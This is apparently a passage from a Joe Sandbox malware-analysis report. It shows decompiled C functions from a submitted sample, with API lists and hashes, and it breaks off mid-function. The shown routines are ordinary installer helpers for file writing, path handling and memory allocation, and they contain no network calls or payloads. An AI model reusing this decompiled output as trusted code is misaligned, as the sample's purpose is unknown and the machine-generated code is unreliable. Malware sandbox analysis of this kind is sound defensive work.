                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: f852d3ed4d365f2fc59bcb78482b8cd22d333de780742c365c0179b4a3e6d5e3
                                                                                                                                                                                                                                            • Instruction ID: 24f42b8dcbde62288e7ee69becc3bae6400bbd50952107d828ced6d6d7af3d18
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f852d3ed4d365f2fc59bcb78482b8cd22d333de780742c365c0179b4a3e6d5e3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16016DABE5697026F32481694C88FB7555CCBDA735F1B0334BDEAE71D2D6644C0491E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A44AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 =  *0xa4858c; // 0x268
                                                                                                                                                                                                                                            				_t9 = E00A43680(_t20);
                                                                                                                                                                                                                                            				if( *0xa491d8 == 0) {
                                                                                                                                                                                                                                            					_push(_t24);
                                                                                                                                                                                                                                            					_t12 = WriteFile( *(0xa48d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t25 = _a12;
                                                                                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            							_t14 =  *0xa49400; // 0xc7800
                                                                                                                                                                                                                                            							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                            							 *0xa49400 = _t15;
                                                                                                                                                                                                                                            							if( *0xa48184 != 0) {
                                                                                                                                                                                                                                            								_t21 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa493f8, 0);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A43680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A4369F
                                                                                                                                                                                                                                              • Part of subcall function 00A43680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A436B2
                                                                                                                                                                                                                                              • Part of subcall function 00A43680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A436DA
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A44B05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                            • Opcode ID: 4eca0a5de7621436c9bb09cb5485ea05d95532f6f1121b5ff437a85fda5ec39a
                                                                                                                                                                                                                                            • Instruction ID: 6a8dd62eb3369647295344a3a7e3bd0dbd94473a5412385336496dd6f83f5d76
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4eca0a5de7621436c9bb09cb5485ea05d95532f6f1121b5ff437a85fda5ec39a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2401403D241205ABDB14CF98EC05BA77769E7C9729F148225F939971E0CB72D823CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A4658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                            				char* _t6;
                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				char* _t16;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				char* _t19;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t17 + 1; // 0xa48b3f
                                                                                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t4 =  *_t17;
                                                                                                                                                                                                                                            					_t17 = _t17 + 1;
                                                                                                                                                                                                                                            				} while (_t4 != 0);
                                                                                                                                                                                                                                            				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                            				_t2 = _t18 + 1; // 0xa48b40
                                                                                                                                                                                                                                            				if(_t2 < __edx) {
                                                                                                                                                                                                                                            					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                            					if(_t19 > __ecx) {
                                                                                                                                                                                                                                            						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                            						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                            							 *_t19 = 0x5c;
                                                                                                                                                                                                                                            							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t6 = _a4;
                                                                                                                                                                                                                                            					 *_t19 = 0;
                                                                                                                                                                                                                                            					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                            						_t6 = _t6 + 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return E00A416B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0x8007007a;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A48B3E,00A48B3F,00000001,00A48B3E,-00000003,?,00A460EC,00A41140,?), ref: 00A465BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: 6dbf4d442b0d1c6cb501ad7d74094e14b36118780ebda9296bf529ab53fbb398
                                                                                                                                                                                                                                            • Instruction ID: 0a0f3ae5298ea4bb3cba7f328fd41e778e12c53e8accae80df703b75d68f42af
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dbf4d442b0d1c6cb501ad7d74094e14b36118780ebda9296bf529ab53fbb398
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38F04C3A1042509BD3315E1D9884B67BFDE9BC7350F28016EE8DAC3205CA658C4683A3
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A4621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E00A4597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A4623F
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                              • Part of subcall function 00A46285: GetLastError.KERNEL32(00A45BBC), ref: 00A46285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            • Opcode ID: 5fdf7aedb1952bf290419f165bc22fbb7f6d5e39308fbaa01e9972bacc1865db
                                                                                                                                                                                                                                            • Instruction ID: b23c72af148346e13eeff2f7f6fd6fe8e92453e1238a1f16fdf8256cd36b2f07
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fdf7aedb1952bf290419f165bc22fbb7f6d5e39308fbaa01e9972bacc1865db
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02F0E9B8B00208BBD750EBB49E02FFF33BCDBD5300F40006AB986D6082DEB59D458651
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A44B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0xa48d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0xa48d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0xa48d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa48d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa48d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa48d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa48d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A44FA1,00000000), ref: 00A44B98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: f6b9c8af8d03ad5ea062f8992a6f5a7361d34ff098fdd9fae98a6142b9c6d4e7
                                                                                                                                                                                                                                            • Instruction ID: 917d19439405a7fccc52a758e6adafac39f0e03f1bd6f5e2b6af3b0940efdc7e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6b9c8af8d03ad5ea062f8992a6f5a7361d34ff098fdd9fae98a6142b9c6d4e7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADF01239D41B089E9B71DF79EC00656BBE4EAE5360310092E946EE2190DB74A442DB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A466AE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				unsigned int _t1;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                            					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,00A44777,?,00A44E38,?), ref: 00A466B1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            • Opcode ID: c775fc15ddd7026894e0f587e11b963e527030dda54bd4ab264c1f3091c0c1ea
                                                                                                                                                                                                                                            • Instruction ID: 17831a0eb4a929b012183fed9a40d22d312bda9682cdfcc620b164585b0459ca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c775fc15ddd7026894e0f587e11b963e527030dda54bd4ab264c1f3091c0c1ea
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79B0927E262450426A2447B16C295562941A6D263B7E51B94F032C01E0CA3EC846D005
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A44CA0(long _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A44CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            • Opcode ID: 475ca8363c9863bcdf75b2988461c13a7917b46a1065668218ed99b1f6ff8fe2
                                                                                                                                                                                                                                            • Instruction ID: 1f8cd68ca1780d77173fa8408a7012a6d70bcf3868f92546a5651efbf26bbf80
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 475ca8363c9863bcdf75b2988461c13a7917b46a1065668218ed99b1f6ff8fe2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3B0123A08420CB7DF001FC2EC09F853F1DE7C5761F140000F60C454508A73941186A6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A44CC0(void* _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                            • Opcode ID: e831385df98155339262e75e3bd869aa9605f55ac713bd4f6e10f618208c65ff
                                                                                                                                                                                                                                            • Instruction ID: 531caf0a64486b1d07e5e84c77be840cc98d5e704836c6ec02f0a36561ca7c60
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e831385df98155339262e75e3bd869aa9605f55ac713bd4f6e10f618208c65ff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72B0123504010CB78F001B82EC088453F1DD6C12607000010F50C414218B3398128585
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A45C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                            				signed int _t143;
                                                                                                                                                                                                                                            				CHAR* _t144;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                            				char _t155;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                                                                            				char _t170;
                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                            				intOrPtr* _t183;
                                                                                                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                                                                                                            				CHAR* _t199;
                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                            				CHAR* _t201;
                                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                            				int _t209;
                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                            				void* _t212;
                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                            				CHAR* _t218;
                                                                                                                                                                                                                                            				intOrPtr* _t219;
                                                                                                                                                                                                                                            				intOrPtr* _t220;
                                                                                                                                                                                                                                            				signed int _t221;
                                                                                                                                                                                                                                            				signed int _t223;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t173 = __ecx;
                                                                                                                                                                                                                                            				_t61 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                            				_t209 = 1;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					while(_t209 != 0) {
                                                                                                                                                                                                                                            						_t67 =  *_t173;
                                                                                                                                                                                                                                            						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                            							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v272 = _t173;
                                                                                                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t69 = _v272;
                                                                                                                                                                                                                                            							_t177 = 0;
                                                                                                                                                                                                                                            							_t213 = 0;
                                                                                                                                                                                                                                            							_t163 = 0;
                                                                                                                                                                                                                                            							_t202 = 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								if(_t213 != 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L21;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t69 =  *_t69;
                                                                                                                                                                                                                                            									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t69 = _v272;
                                                                                                                                                                                                                                            										L21:
                                                                                                                                                                                                                                            										_t155 =  *_t69;
                                                                                                                                                                                                                                            										if(_t155 != 0x22) {
                                                                                                                                                                                                                                            											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            												goto L106;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                            												_t177 = _t177 + 1;
                                                                                                                                                                                                                                            												_t202 = _t202 + 1;
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                            												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            													L106:
                                                                                                                                                                                                                                            													_t63 = 0;
                                                                                                                                                                                                                                            													L125:
                                                                                                                                                                                                                                            													_pop(_t210);
                                                                                                                                                                                                                                            													_pop(_t212);
                                                                                                                                                                                                                                            													_pop(_t162);
                                                                                                                                                                                                                                            													return E00A46CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                            													_t177 = _t177 + 1;
                                                                                                                                                                                                                                            													_t202 = _t202 + 1;
                                                                                                                                                                                                                                            													_t157 = 2;
                                                                                                                                                                                                                                            													goto L30;
